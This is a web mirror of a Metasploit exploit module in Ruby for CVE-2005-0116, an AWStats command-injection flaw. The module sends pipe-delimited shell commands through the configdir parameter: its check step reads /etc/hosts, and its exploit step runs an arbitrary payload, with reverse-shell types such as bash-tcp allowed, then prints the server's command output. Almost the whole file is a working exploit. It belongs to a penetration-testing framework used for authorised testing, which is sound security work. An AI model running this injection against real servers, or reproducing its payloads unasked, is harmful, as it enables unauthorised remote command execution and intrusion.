Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/awstats_configdir_exec.rb
19719 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'AWStats configdir Remote Command Execution',

16
        'Description' => %q{

17
          This module exploits an arbitrary command execution vulnerability in the

18
          AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2

19
          are vulnerable.

20
        },

21
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          ['CVE', '2005-0116'],

25
          ['OSVDB', '13002'],

26
          ['BID', '12298'],

27
          ['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'DisableNops' => true,

32
          'Space' => 512,

33
          'Compat' =>

34
                        {

35
                          'PayloadType' => 'cmd cmd_bash',

36
                          'RequiredCmd' => 'generic perl ruby python telnet bash-tcp',

37
                        }

38
        },

39
        'Platform' => 'unix',

40
        'Arch' => ARCH_CMD,

41
        'Targets' => [[ 'Automatic', {}]],

42
        'DisclosureDate' => '2005-01-15',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),

55
      ]

56
    )

57
  end

58


59
  def check

60
    res = send_request_cgi({

61
      'uri' => normalize_uri(datastore['URI']),

62
      'vars_get' =>

63
      {

64
        'configdir' => '|echo;cat /etc/hosts;echo|'

65
      }

66
    }, 25)

67


68
    if (res and res.body.match(/localhost/))

69
      return Exploit::CheckCode::Vulnerable

70
    end

71


72
    return Exploit::CheckCode::Safe

73
  end

74


75
  def exploit

76
    command = Rex::Text.uri_encode(payload.encoded)

77
    urlconfigdir = normalize_uri(datastore['URI']) + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"

78


79
    res = send_request_raw({

80
      'uri' => urlconfigdir,

81
      'method' => 'GET',

82
      'headers' =>

83
      {

84
        'Connection' => 'Close',

85
      }

86
    }, 25)

87


88
    if (res)

89
      print_status("The server returned: #{res.code} #{res.message}")

90


91
      m = res.body.match(/YYY\n(.*)\nYYY/m)

92


93
      if (m)

94
        print_status("Command output from the server:")

95
        print("\n" + m[1] + "\n\n")

96
      else

97
        print_status("This server may not be vulnerable")

98
      end

99
    else

100
      print_status("No response from the server")

101
    end

102
  end

103
end

104


105